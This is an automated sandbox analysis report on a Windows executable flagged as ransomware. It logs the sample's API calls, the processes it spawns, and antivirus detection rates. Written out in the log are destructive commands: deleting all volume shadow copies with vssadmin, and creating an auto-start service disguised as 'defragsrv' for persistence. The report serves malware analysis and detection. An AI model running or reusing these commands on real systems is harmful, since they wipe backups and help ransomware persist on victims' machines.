Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E618E0 NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,MoveFileW,MoveFileW,GetLastError,__Mtx_unlock,0_2_00E618E0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E6F290 NtSetInformationProcess,0_2_00E6F290
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E86270 SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,0_2_00E86270
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E84B50 CreateFileW,CloseHandle,_wcschr,_wcschr,OpenProcess,GetModuleFileNameExW,NtTerminateProcess,NtTerminateProcess,CloseHandle,CreateFileW,OpenProcess,NtDuplicateObject,CreateFileW,CreateFileW,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,Sleep,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,RmEndSession,EnumProcesses,EnumProcesses,RmEndSession,RmEndSession,0_2_00E84B50
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E84460 OpenProcess,_wcschr,_wcschr,NtQuerySystemInformation,NtQuerySystemInformation,NtDuplicateObject,CloseHandle,CloseHandle,OpenProcess,GetModuleFileNameExW,CloseHandle,CloseHandle,OpenProcess,NtTerminateProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtDuplicateObject,0_2_00E84460
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E85D70 SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,0_2_00E85D70
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E85FC0 NtQueryObject,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,0_2_00E85FC0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E86E30 NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,15_2_00E86E30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E618E0 NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,15_2_00E618E0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E86270 SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,15_2_00E86270
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E84B50 CreateFileW,CloseHandle,_wcschr,_wcschr,OpenProcess,GetModuleFileNameExW,NtTerminateProcess,NtTerminateProcess,CloseHandle,CreateFileW,OpenProcess,NtDuplicateObject,CreateFileW,CreateFileW,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,Sleep,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,RmEndSession,EnumProcesses,EnumProcesses,RmEndSession,RmEndSession,15_2_00E84B50
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EB7320 NtQuerySystemInformation,_free,HeapReAlloc,15_2_00EB7320
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E84460 OpenProcess,_wcschr,_wcschr,NtQuerySystemInformation,NtQuerySystemInformation,NtDuplicateObject,CloseHandle,CloseHandle,OpenProcess,GetModuleFileNameExW,CloseHandle,CloseHandle,OpenProcess,NtTerminateProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtDuplicateObject,15_2_00E84460
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E85D70 SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,15_2_00E85D70
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E856C0 EnumProcesses,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,NtDuplicateObject,CloseHandle,CloseHandle,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,15_2_00E856C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E85FC0 NtQueryObject,SetEvent,WaitForSingleObject,NtTerminateThread,NtTerminateThread,CloseHandle,CreateThread,ResetEvent,ResetEvent,15_2_00E85FC0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E58F90 SetServiceStatus,NtSetInformationProcess,GetCurrentProcess,NtSetInformationProcess,SetServiceStatus,15_2_00E58F90
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E83F10 CreateFileA,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,DeleteFileA,CloseHandle,DeleteFileA,15_2_00E83F10
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeFile created: c:\windows\logg.batJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E872500_2_00E87250
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E634600_2_00E63460
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E6DE300_2_00E6DE30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E618E00_2_00E618E0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E688C00_2_00E688C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EA28800_2_00EA2880
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EB20200_2_00EB2020
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EBB0390_2_00EBB039
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EBF0300_2_00EBF030
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EAE00E0_2_00EAE00E
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EA31C00_2_00EA31C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E959D00_2_00E959D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E6C9900_2_00E6C990
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8C9600_2_00E8C960
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E9C9600_2_00E9C960
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E951600_2_00E95160
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E941200_2_00E94120
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E9A1100_2_00E9A110
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8DAF00_2_00E8DAF0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E94A900_2_00E94A90
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EC0A4F0_2_00EC0A4F
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E932500_2_00E93250
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8C2200_2_00E8C220
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8AA000_2_00E8AA00
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E6B3D00_2_00E6B3D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8C3700_2_00E8C370
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E923100_2_00E92310
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EC2CE60_2_00EC2CE6
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E92CC00_2_00E92CC0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E924B00_2_00E924B0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E844600_2_00E84460
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8AC300_2_00E8AC30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E54DE30_2_00E54DE3
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8ADE00_2_00E8ADE0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EADDDC0_2_00EADDDC
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8BD200_2_00E8BD20
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E69D100_2_00E69D10
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8C6D00_2_00E8C6D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E55E020_2_00E55E02
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E95E000_2_00E95E00
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EC2E060_2_00EC2E06
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EAA7C00_2_00EAA7C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E9AF700_2_00E9AF70
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E5F0D015_2_00E5F0D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA288015_2_00EA2880
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EB202015_2_00EB2020
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EBB03915_2_00EBB039
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EAE00E15_2_00EAE00E
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E691D015_2_00E691D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E959D015_2_00E959D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E6C99015_2_00E6C990
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8C96015_2_00E8C960
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9C96015_2_00E9C960
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9516015_2_00E95160
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9412015_2_00E94120
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA393015_2_00EA3930
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9A11015_2_00E9A110
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E64AE015_2_00E64AE0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8DAF015_2_00E8DAF0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E61AA015_2_00E61AA0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E94A9015_2_00E94A90
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EC0A4F15_2_00EC0A4F
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8725015_2_00E87250
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9325015_2_00E93250
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8C22015_2_00E8C220
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8AA0015_2_00E8AA00
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA43F015_2_00EA43F0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8C37015_2_00E8C370
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9231015_2_00E92310
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EC2CE615_2_00EC2CE6
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E92CC015_2_00E92CC0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8446015_2_00E84460
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA4C5015_2_00EA4C50
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8AC3015_2_00E8AC30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E54DE315_2_00E54DE3
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E665E015_2_00E665E0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8ADE015_2_00E8ADE0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EADDDC15_2_00EADDDC
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E7BD7015_2_00E7BD70
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8BD2015_2_00E8BD20
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E856C015_2_00E856C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E8C6D015_2_00E8C6D0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E6062015_2_00E60620
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E6DE3015_2_00E6DE30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA4E3015_2_00EA4E30
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E55E0215_2_00E55E02
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EC2E0615_2_00EC2E06
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EAA7C015_2_00EAA7C0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E9AF7015_2_00E9AF70
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: String function: 00EA8780 appears 65 times
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: String function: 00E59260 appears 36 times
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: String function: 00EB19A1 appears 31 times
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: String function: 00EB5C1D appears 33 times
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: String function: 00E73CB0 appears 42 times
Source: 3PSo7GcHhV.exe, 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmpBinary or memory string: OriginalFilenamesdelete.exeJ vs 3PSo7GcHhV.exe
Source: 3PSo7GcHhV.exe, 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmpBinary or memory string: OriginalFilenamesdelete.exeJ vs 3PSo7GcHhV.exe
Source: 3PSo7GcHhV.exeBinary or memory string: OriginalFilenamesdelete.exeJ vs 3PSo7GcHhV.exe
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
Source: 3PSo7GcHhV.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: classification engineClassification label: mal84.rans.expl.evad.winEXE@34/14@0/100
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E86E80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,0_2_00E86E80
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E86E80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,15_2_00E86E80
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E583B0 Sleep,GetModuleFileNameW,Sleep,GetModuleFileNameW,GetModuleFileNameW,StartServiceCtrlDispatcherW,GetModuleFileNameW,Sleep,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateThread,WaitForSingleObject,SetServiceStatus,OutputDebugStringW,15_2_00E583B0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E583B0 Sleep,GetModuleFileNameW,Sleep,GetModuleFileNameW,GetModuleFileNameW,StartServiceCtrlDispatcherW,GetModuleFileNameW,Sleep,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateThread,WaitForSingleObject,SetServiceStatus,OutputDebugStringW,15_2_00E583B0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeFile created: c:\users\user\desktop\msvsc.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1084:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6056:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_01
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\cmd.exe 'c:\windows\system32\cmd.exe' /c c:\windows\logg.bat
Source: 3PSo7GcHhV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 3PSo7GcHhV.exeVirustotal: Detection: 62%
Source: 3PSo7GcHhV.exeMetadefender: Detection: 34%
Source: 3PSo7GcHhV.exeReversingLabs: Detection: 65%
Source: unknownProcess created: C:\Users\user\Desktop\3PSo7GcHhV.exe 'C:\Users\user\Desktop\3PSo7GcHhV.exe'
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\cmd.exe 'c:\windows\system32\cmd.exe' /c c:\windows\logg.bat
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\vssadmin.exe 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /Quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\VSSVC.exe C:\Windows\system32\vssvc.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k swprv
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'c:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'c:\windows\system32\sc.exe' start defragsrv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\Desktop\3PSo7GcHhV.exe C:\Users\user\Desktop\3PSo7GcHhV.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= autoJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\cmd.exe 'c:\windows\system32\cmd.exe' /c c:\windows\logg.batJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\vssadmin.exe 'c:\Windows\system32\vssadmin.exe' Delete Shadows /All /QuietJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'c:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= autoJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'c:\windows\system32\sc.exe' start defragsrvJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
Source: C:\Windows\System32\vssadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32Jump to behavior
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 3PSo7GcHhV.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: 3PSo7GcHhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\agent\_work\5\s\Release\Sdelete.pdb source: 3PSo7GcHhV.exe
Source: Binary string: C:\Users\m\Documents\tempver\ConsoleApp1\cppEnd\Release\cppEndWin32.pdb source: 3PSo7GcHhV.exe
Source: 3PSo7GcHhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 3PSo7GcHhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 3PSo7GcHhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 3PSo7GcHhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 3PSo7GcHhV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00E8CCF0 LoadLibraryA,GetProcAddress,0_2_00E8CCF0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 0_2_00EA817D push ecx; ret 0_2_00EA8190
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00EA817D push ecx; ret 15_2_00EA8190
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: 15_2_00E583B0 Sleep,GetModuleFileNameW,Sleep,GetModuleFileNameW,GetModuleFileNameW,StartServiceCtrlDispatcherW,GetModuleFileNameW,Sleep,RegisterServiceCtrlHandlerW,SetServiceStatus,CreateThread,WaitForSingleObject,SetServiceStatus,OutputDebugStringW,15_2_00E583B0
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeProcess created: C:\Windows\System32\sc.exe 'C:\windows\system32\sc.exe' create defragsrv binpath= 'C:\Users\user\Desktop\3PSo7GcHhV.exe' start= auto
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetAdaptersInfo,GetAdaptersInfo,__Mtx_init_in_situ,std::ios_base::_Ios_base_dtor,std::ios_base::_Ios_base_dtor,Sleep,CreateThread,WaitForSingleObject,CloseHandle,__Mtx_destroy_in_situ,Concurrency::cancel_current_task,Concurrency::cancel_current_task,NetShareEnum,NetApiBufferFree,__Mtx_unlock,0_2_00E87250
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeCode function: GetAdaptersInfo,GetAdaptersInfo,__Mtx_init_in_situ,std::ios_base::_Ios_base_dtor,std::ios_base::_Ios_base_dtor,Sleep,CreateThread,WaitForSingleObject,CloseHandle,__Mtx_destroy_in_situ,Concurrency::cancel_current_task,Concurrency::cancel_current_task,15_2_00E87250
Source: C:\Users\user\Desktop\3PSo7GcHhV.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exe TID: 5992Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exe TID: 5992Thread sleep time: -1920000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exe TID: 808Thread sleep time: -10800000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3PSo7GcHhV.exe TID: 5992Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6168Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
